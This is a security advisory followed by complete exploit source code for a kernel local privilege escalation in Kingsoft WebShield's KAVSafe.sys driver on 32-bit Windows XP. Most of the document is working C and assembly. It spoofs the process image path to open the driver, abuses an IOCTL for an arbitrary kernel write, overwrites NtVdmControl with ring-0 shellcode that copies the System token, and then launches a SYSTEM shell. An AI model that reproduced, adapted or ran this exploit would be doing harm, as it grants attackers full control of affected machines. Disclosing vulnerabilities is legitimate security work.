|
=0D
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
VULNERABLE PRODUCTS
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)

Signature Date: 2010-5-23 2:33:54

and

KAVSafe.sys <= 2010.4.14.609
Signature Date: 2010-4-14 13:42:26
=0D
DETAILS:
KAVSafe.sys creates a device named \Device\KAVSafe and handles a DeviceIoControl request with IoControlCode = 0x830020d4 (CTL_CODE(0x8300, 0x835, METHOD_BUFFERED, FILE_ANY_ACCESS)) that lets the caller overwrite arbitrary data inside a loaded kernel module. As laid out by the PoC below, the input buffer carries a module name, an RVA inside that module and a byte count, followed by the bytes to write; a user-mode caller thereby obtains an arbitrary kernel write. The PoC overwrites the entry of NtVdmControl in the kernel image with a payload that copies the System process token into the calling process, then calls NtVdmControl from user mode to run it at ring 0 and spawns cmd.exe. Before opening the device the PoC rewrites its own PEB ImagePathName to the WebShield installer path (kavinst.exe), which suggests the driver gates opens on the caller's image path -- a check that is trivially bypassed from user mode, as shown. The exploit is specific to 32-bit Windows XP (hard-coded KPCR/EPROCESS offsets).
=0D
EXPLOIT CODE:=0D
=0D
/*
 * IOCTL handled by KAVSafe.sys.  CTL_CODE(0x8300, 0x835, METHOD_BUFFERED,
 * FILE_ANY_ACCESS) evaluates to 0x830020d4, the code named in the advisory
 * above.  The name is this PoC's: the request it sends (see main) carries a
 * kernel module name, an RVA and a byte count, and per the advisory the
 * driver writes the trailing bytes into that module.
 */
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
/* ntdll!NtQueryInformationProcess, resolved at run time with GetProcAddress.
 * Only class 0 (ProcessBasicInformation) is used, to obtain the PEB address. */
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);

/* Counted ANSI string (ntdef.h STRING); only needed to lay out
 * RTL_DRIVE_LETTER_CURDIR below. */
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
/* Per-drive current directory entry; present only so that
 * RTL_USER_PROCESS_PARAMETERS has the right size/layout. */
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
/* Counted UTF-16 string (ntdef.h UNICODE_STRING).  Length and MaximumLength
 * are in bytes, not characters; main relies on that when it rewrites
 * ImagePathName. */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
} CURDIR, *PCURDIR;
/* User-mode process parameter block hanging off the PEB.  The PoC touches
 * only ImagePathName; every field before it must match the layout of the
 * running (32-bit XP) ntdll for that member's offset to be correct. */
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory; // ProcessParameters
UNICODE_STRING DllPath; // ProcessParameters
UNICODE_STRING ImagePathName; // ProcessParameters -- rewritten by main before opening the device
UNICODE_STRING CommandLine; // ProcessParameters
PVOID Environment; // NtAllocateVirtualMemory
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle; // ProcessParameters
UNICODE_STRING DesktopInfo; // ProcessParameters
UNICODE_STRING ShellInfo; // ProcessParameters
UNICODE_STRING RuntimeData; // ProcessParameters
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
/* Leading part of the PEB, declared only as far as ProcessParameters
 * (the one member the PoC dereferences). */
typedef struct _PEB {
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the
BOOLEAN ReadImageFileExecOptions; //
BOOLEAN BeingDebugged; //
BOOLEAN SpareBool; //
HANDLE Mutant; // INITIAL_PEB structure is also updated.
PVOID ImageBaseAddress;
PVOID Ldr;
struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;
} PEB, *PPEB;
typedef LONG KPRIORITY;
/* Output of NtQueryInformationProcess(ProcessBasicInformation);
 * only PebBaseAddress is read. */
typedef struct _PROCESS_BASIC_INFORMATION {
LONG ExitStatus;
PVOID PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
/* One entry of NtQuerySystemInformation(SystemModuleInformation).  Only
 * ImageName of entry 0 is used (to find the kernel's file name); the other
 * field names are the PoC author's labels and are not relied upon. */
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

/* Header of the SystemModuleInformation buffer.  Module[1] is a
 * one-entry placeholder; the real buffer holds Count entries, and the
 * kernel image is entry 0 on the XP systems this PoC targets. */
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;
/* ntdll!NtQuerySystemInformation, resolved at run time.  Class 0xb
 * (SystemModuleInformation) is the only one used. */
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (
LONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

/* Pseudo-handle for the current process (same value as GetCurrentProcess()). */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
/* ntdll!NtVdmControl(Service, ServiceData): the system call whose
 * kernel-side entry the PoC overwrites with R0ShellCodeXP and then invokes
 * from user mode.  Two stdcall arguments, which is why the payload ends
 * with "ret 8". */
typedef LONG (WINAPI *PNT_VDM_CONTROL) (
ULONG Service,
PVOID ServiceData
);
/*
 * Ring-0 payload that main() has the driver write over the entry of
 * NtVdmControl.  It walks the active process list until it finds the
 * process with PID 4 and copies one EPROCESS field from it into the
 * current process; on the 32-bit XP layout these offsets address
 * (NOTE(review): offsets as used by the original author -- confirm for
 * the exact service pack before running, a wrong one bugchecks):
 *   0xffdff124         KPCR (0xffdff000) + 0x124 = KPRCB.CurrentThread
 *   [KTHREAD+0x220]    ThreadsProcess -> current EPROCESS
 *   [EPROCESS+0x88]    ActiveProcessLinks.Flink
 *   [EPROCESS+0x84]    UniqueProcessId
 *   [EPROCESS+0xc8]    Token
 * so the net effect is stealing the System process's token.  Declared
 * naked so that no prologue/epilogue is emitted: main() copies the raw
 * bytes from this address up to NopNop.  Nothing but 32-bit XP is
 * supported, hence the name.
 */
VOID __declspec(naked) R0ShellCodeXP()
{
__asm
{
; eax = address of KPRCB.CurrentThread, then the current KTHREAD
mov eax,0xffdff124
mov eax,[eax]
; esi = current EPROCESS (kept so the token can be installed at the end)
mov esi ,dword ptr[eax+0x220]
mov eax,esi
; follow ActiveProcessLinks until UniqueProcessId == 4 (System)
searchxp:
mov eax,dword ptr[eax+0x88]
; CONTAINING_RECORD(link, EPROCESS, ActiveProcessLinks)
sub eax,0x88
mov edx,dword ptr[eax+0x84]
cmp edx,4
jnz searchxp
; copy System's Token into our own EPROCESS
mov eax,dword ptr[eax+0xc8]
mov dword ptr[esi + 0xc8] , eax
; stdcall return popping NtVdmControl's two DWORD arguments
ret 8
}
}
/*
 * Marker function.  Its body is irrelevant; main() uses the function's
 * address as the end of R0ShellCodeXP when computing the payload size,
 * which relies on the linker placing NopNop immediately after it.
 */
VOID NopNop()
{
fputs("nop!\n", stdout);
}
=0D
#include "malloc.h"=0D
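/*
 * Layout of the METHOD_BUFFERED input that IOCTL_HOTPATCH_KERNEL_MODULE
 * expects, reconstructed from the offsets the original PoC wrote
 * (0: module name, 64: RVA, 68: size, 0x48: patch bytes).  Field names are
 * this PoC's interpretation; the driver-side handler is not visible here.
 */
typedef struct {
CHAR  ModuleName[64];   /* NUL-padded name of the kernel module to patch */
ULONG TargetRva;        /* offset of the first byte to overwrite, from the module base */
ULONG PatchSize;        /* number of patch bytes that follow this header */
} HOTPATCH_REQUEST_HEADER;

/* The patch bytes must land at offset 0x48 exactly; fail the build if the
 * header is ever laid out differently (valid in both C and C++). */
typedef char hotpatch_request_header_size_check[sizeof(HOTPATCH_REQUEST_HEADER) == 0x48 ? 1 : -1];

/* Largest size R0ShellCodeXP can plausibly have; see main() step 4. */
#define MAX_SHELLCODE_SIZE 0x100

/*
 * Reads the WebShield install directory from
 * HKLM\SOFTWARE\Kingsoft\KSWSVC\ProgramPath and appends "\kavinst.exe".
 * path must hold path_chars WCHARs.  Returns nonzero on success; zero if
 * the key/value is missing, is not a string, or the result would not fit.
 * The value is terminated by hand because RegQueryValueEx does not
 * guarantee a terminator on string data (the original PoC assumed one
 * and then wcscat'ed into a buffer that could already be full).
 */
static int get_installer_path(WCHAR *path, size_t path_chars)
{
static const WCHAR suffix[] = L"\\kavinst.exe";
HKEY hkey;
DWORD datatype = 0;
DWORD datasize;
LONG rc;

if (path_chars < 2)
return 0;
/* keep one WCHAR in reserve so a terminator can always be appended */
datasize = (DWORD)((path_chars - 1) * sizeof(WCHAR));

if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Kingsoft\\KSWSVC", 0, KEY_QUERY_VALUE, &hkey) != ERROR_SUCCESS)
return 0;
rc = RegQueryValueExW(hkey, L"ProgramPath", NULL, &datatype, (LPBYTE)path, &datasize);
RegCloseKey(hkey);
if (rc != ERROR_SUCCESS || (datatype != REG_SZ && datatype != REG_EXPAND_SZ))
return 0;

path[datasize / sizeof(WCHAR)] = L'\0';
if (wcslen(path) + (sizeof(suffix) / sizeof(suffix[0]) - 1) >= path_chars)
return 0;
wcscat(path, suffix);
return 1;
}

/*
 * Opens \\.\KAVSafe while this process's PEB ImagePathName temporarily
 * reads spoofed_image_path.  The PoC does this before every open, which
 * suggests the driver decides who may open the device from the caller's
 * image path (a check any user-mode caller can defeat this way); the driver
 * logic itself is not visible here.  ImagePathName is restored whether or
 * not the open succeeds, and the spoofed path is refused if it does not
 * fit in the existing buffer (the original PoC copied unchecked and could
 * overrun the process parameter block).
 * Returns INVALID_HANDLE_VALUE on failure with GetLastError() set.
 */
static HANDLE open_device_as(const WCHAR *spoofed_image_path)
{
PROCESS_BASIC_INFORMATION pbi;
PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess;
PUNICODE_STRING image;
PVOID saved;
USHORT saved_len;
size_t new_len;
HANDLE hdev;
DWORD err;

pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
if (pNtQueryInformationProcess == NULL)
return INVALID_HANDLE_VALUE;
/* class 0 == ProcessBasicInformation; STATUS_SUCCESS is 0 */
if (pNtQueryInformationProcess(NtCurrentProcess(), 0, &pbi, sizeof(pbi), NULL) != 0) {
SetLastError(ERROR_INVALID_DATA);
return INVALID_HANDLE_VALUE;
}

image = &((PPEB)pbi.PebBaseAddress)->ProcessParameters->ImagePathName;
new_len = wcslen(spoofed_image_path) * sizeof(WCHAR);
if (new_len > image->MaximumLength) {
SetLastError(ERROR_INSUFFICIENT_BUFFER);
return INVALID_HANDLE_VALUE;
}
/* save the whole buffer so the restore is independent of old/new lengths */
saved = malloc(image->MaximumLength);
if (saved == NULL) {
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return INVALID_HANDLE_VALUE;
}
RtlCopyMemory(saved, image->Buffer, image->MaximumLength);
saved_len = image->Length;

RtlCopyMemory(image->Buffer, spoofed_image_path, new_len);
image->Length = (USHORT)new_len;

hdev = CreateFileA("\\\\.\\KAVSafe", FILE_READ_ATTRIBUTES, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
err = GetLastError();

RtlCopyMemory(image->Buffer, saved, image->MaximumLength);
image->Length = saved_len;
free(saved);

SetLastError(err);
return hdev;
}

/*
 * Copies the bare file name (no directory) of loaded kernel module 0 --
 * the kernel image itself on the XP systems this PoC targets -- into
 * name_buf.  The list comes from NtQuerySystemInformation(
 * SystemModuleInformation), sized from the first call's ReturnLength
 * instead of passing a one-entry buffer and ignoring the status as the
 * original PoC did.  Returns nonzero on success.
 */
static int get_kernel_file_name(char *name_buf, size_t name_buf_size)
{
PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation;
PX_SYSTEM_MODULE_INFORMATION mods;
ULONG needed = 0;
char *image_name;
const char *base_name;
size_t len;

pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
if (pNtQuerySystemInformation == NULL || name_buf_size == 0)
return 0;

/* 0xb == SystemModuleInformation.  The sizing call is expected to fail
 * (STATUS_INFO_LENGTH_MISMATCH) while reporting the required length. */
pNtQuerySystemInformation(0xb, NULL, 0, &needed);
if (needed == 0)
return 0;
/* slack in case a module loads between the two calls */
needed += sizeof(SYSTEM_MODULE_INFORMATION_ENTRY);
mods = (PX_SYSTEM_MODULE_INFORMATION)malloc(needed);
if (mods == NULL)
return 0;
if (pNtQuerySystemInformation(0xb, mods, needed, NULL) != 0 || mods->Count == 0) {
free(mods);
return 0;
}

/* ImageName is a fixed 256-byte field; do not trust it to be terminated. */
image_name = mods->Module[0].ImageName;
image_name[sizeof(mods->Module[0].ImageName) - 1] = '\0';
base_name = strrchr(image_name, '\\');
base_name = (base_name != NULL) ? base_name + 1 : image_name;

len = strlen(base_name);
if (len == 0 || len >= name_buf_size) {
free(mods);
return 0;
}
RtlCopyMemory(name_buf, base_name, len + 1);
free(mods);
return 1;
}

/*
 * Sends one IOCTL_HOTPATCH_KERNEL_MODULE request asking the driver to
 * write patch_size bytes from patch at target_rva inside "ntoskrnl.exe".
 * The module name is hard-coded as in the original PoC even when the RVA
 * was resolved from ntkrnlpa.exe; whether the driver matches the name
 * literally or treats it as "the kernel" cannot be told from here.
 * Returns the DeviceIoControl result; GetLastError() is preserved.
 */
static BOOL send_hotpatch(HANDLE hdev, ULONG target_rva, const void *patch, ULONG patch_size)
{
static const CHAR module_name[] = "ntoskrnl.exe";
HOTPATCH_REQUEST_HEADER *req;
ULONG total = (ULONG)sizeof(*req) + patch_size;
ULONG btr = 0;
BOOL ok;
DWORD err;

req = (HOTPATCH_REQUEST_HEADER *)malloc(total);
if (req == NULL) {
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return FALSE;
}
RtlZeroMemory(req, total);
RtlCopyMemory(req->ModuleName, module_name, sizeof(module_name));
req->TargetRva = target_rva;
req->PatchSize = patch_size;
RtlCopyMemory(req + 1, patch, patch_size);

ok = DeviceIoControl(hdev, IOCTL_HOTPATCH_KERNEL_MODULE, req, total, NULL, 0, &btr, NULL);
err = GetLastError();
free(req);
SetLastError(err);
return ok;
}

/*
 * Proof of concept: (1) locate WebShield, (2) open \\.\KAVSafe while
 * posing as its installer, (3) find the RVA of NtVdmControl in the
 * kernel image, (4) size the ring-0 payload, (5) have the driver write
 * the payload over NtVdmControl's entry, (6) call NtVdmControl so the
 * payload runs at ring 0 and copies the System token into this process,
 * then spawn cmd.exe with it.  32-bit Windows XP only: the payload's
 * offsets are hard-coded for that kernel and patching any other kernel
 * with them bugchecks the machine.  Every step reports failure and exits
 * after a keypress, as the original did.
 */
int main(int argc, char* argv[])
{
WCHAR installer_path[MAX_PATH];
char kernel_file[256];
HANDLE hdev;
HMODULE kernel;
PVOID export_va;
ULONG rva;
ULONG_PTR shellcode_begin;
ULONG_PTR shellcode_end;
ULONG shellcode_size;
PNT_VDM_CONTROL pR3NtVdmControl;

(void)argc;
(void)argv;

printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"
"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
"2010-5-23\n"
"By Lincoin \n\nPress Enter");

/* (1) The installer path doubles as the image path we impersonate. */
if (!get_installer_path(installer_path, MAX_PATH)) {
printf("KSWebShield not installed\n");
getchar();
return 0;
}

/* (2) */
hdev = open_device_as(installer_path);
if (hdev == INVALID_HANDLE_VALUE) {
printf("cannot open device %lu\n", (unsigned long)GetLastError());
getchar();
return 0;
}

/* (3) Load the kernel's own file as a user-mode image (exports only, no
 * import binding) and resolve NtVdmControl; the RVA is the same in the
 * running kernel. */
if (!get_kernel_file_name(kernel_file, sizeof(kernel_file))) {
printf("cannot load ntoskrnl!\n");
CloseHandle(hdev);
getchar();
return 0;
}
kernel = LoadLibraryExA(kernel_file, NULL, DONT_RESOLVE_DLL_REFERENCES);
if (kernel == NULL) {
printf("cannot load ntoskrnl!\n");
CloseHandle(hdev);
getchar();
return 0;
}
export_va = (PVOID)GetProcAddress(kernel, "NtVdmControl");
if (export_va == NULL) {
printf("cannot find NtVdmControl!\n");
FreeLibrary(kernel);
CloseHandle(hdev);
getchar();
return 0;
}
rva = (ULONG)((ULONG_PTR)export_va - (ULONG_PTR)kernel);
FreeLibrary(kernel);

printf("NtVdmControl = %08lx", (unsigned long)rva);
getchar();

/* (4) The payload size is the distance from R0ShellCodeXP to NopNop.
 * That assumes the linker emitted them back to back (release build, no
 * incremental-link thunks); an implausible value means it did not, and
 * sending it would corrupt the kernel, so bail out instead. */
shellcode_begin = (ULONG_PTR)R0ShellCodeXP;
shellcode_end = (ULONG_PTR)NopNop;
if (shellcode_end <= shellcode_begin || shellcode_end - shellcode_begin > MAX_SHELLCODE_SIZE) {
printf("cannot determine shellcode size (build without incremental linking)\n");
CloseHandle(hdev);
getchar();
return 0;
}
shellcode_size = (ULONG)(shellcode_end - shellcode_begin);

/* (5) */
if (!send_hotpatch(hdev, rva, (const void *)shellcode_begin, shellcode_size)) {
printf("cannot device io control!%lu\n", (unsigned long)GetLastError());
CloseHandle(hdev);
getchar();
return 0;
}
CloseHandle(hdev);

/* (6) NtVdmControl now runs the payload in ring 0 (which returns with
 * "ret 8", matching the two stdcall arguments); afterwards this process
 * carries the System token, so the shell inherits it. */
pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtVdmControl");
if (pR3NtVdmControl == NULL) {
printf("cannot find NtVdmControl!\n");
getchar();
return 0;
}
pR3NtVdmControl(0, 0);
WinExec("cmd.exe", SW_SHOW);
printf("OK!\n ");
getchar();
return 0;
}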
=0D
=0D
=0D
=0D